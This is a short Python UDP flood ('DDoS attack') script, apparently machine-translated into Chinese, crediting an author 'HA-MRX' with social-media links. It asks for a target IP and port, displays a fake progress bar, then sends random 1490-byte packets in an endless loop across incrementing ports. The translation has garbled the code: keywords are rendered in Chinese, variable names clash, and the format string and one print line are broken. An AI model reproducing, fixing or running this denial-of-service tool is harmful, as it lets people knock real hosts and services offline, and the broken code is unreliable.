导入系统
导入操作系统
导入时间
汇入通讯端
导入随机
#代码时间
从日期时间导入日期时间
now=datetime.now()
hour=now.hour
分钟=现在.分钟
day=now.day
month=now.month
年=现在.年

##############
sock=socket.socket(socket.AF_INET，socket.SOCK_Dgram)
字节=随机._urandom(1490)
#############

操作系统(“清除”)
os.system(“figlet DDos攻击”)
打印
打印(“作者：HA-MRX”)
打印("You Tube:https://www.youtube.com/channel/UCCgy7i_A5yhAEdY86rPOinA")
打印(“github:https://github.com/Ha3MrX”)
打印("Facebook:https://www.facebook.com/muhamad.jabar222")
打印
IP=输入("IP目标：")
port=输入("Port：")
port=int(端口)

操作系统(“清除”)
os.system(“figlet攻击启动”)
打印(“[]0%”)
time.sleep(5)
打印(“[===]25%”)
time.sleep(5)
打印(“[=========]50%”)
time.sleep(5)
打印]75%")
time.sleep(5)
打印("[====================]100%")
time.sleep(3)
已发送=0
当为True时：
sock.sendto(字节，(ip，端口))
发送=发送+1
port=port+1
打印("已通过端口%2$s将%1$s数据包发送到%3$s"%(已发送，ip，端口))
如果端口==65534：
端口=1
